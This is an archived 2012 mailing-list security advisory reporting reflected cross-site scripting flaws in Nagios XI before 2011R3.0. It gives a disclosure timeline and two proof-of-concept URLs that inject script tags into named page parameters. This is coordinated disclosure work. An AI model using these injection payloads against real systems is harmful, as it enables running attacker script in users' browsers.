lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Date: Thu, 14 Jun 2012 19:38:48 +0100 From: 0a29 40 <0a2940@...il.com> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com Subject: 0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0 ================ 0A29-12-1 : Cross-Site Scripting vulnerabilities in Nagios XI < 2011R3.0 Author: 0a29406d9794e4f9b30b3c5d6702c708 twitter.com/0a29 - 0a29.blogspot.com - GMail 0a2940 ================ Description: ================ Multiple reflected XSS vulnerabilities exist within Nagios XI < 2011R3.0 Fixes detailed in http://assets.nagios.com/downloads/nagiosxi/CHANGES-2011.TXT ================ Timeline: ================ 16 May 2012 - Reported to Nagios Enterprises 16 May 2012 - Acknowledged 16 May 2012 - Reported fixed 04 June 2012 - Nagios XI 2011R3.0 released 14 June 2012 - Public disclosure ================ Details: ================ Page: /includes/components/graphexplorer/visApi.php POC: http://site/nagiosxi/includes/components/graphexplorer/visApi.php?type=bar&div=</script><script>alert('0a29')</script>&opt=topalerts Page: /nagiosxi/perfgraphs/index.php POC: http://site/nagiosxi/perfgraphs/index.php?view='><script>alert('0a29')</script>&start=&end=&startdate=&enddate=
Powered by blists - more mailing lists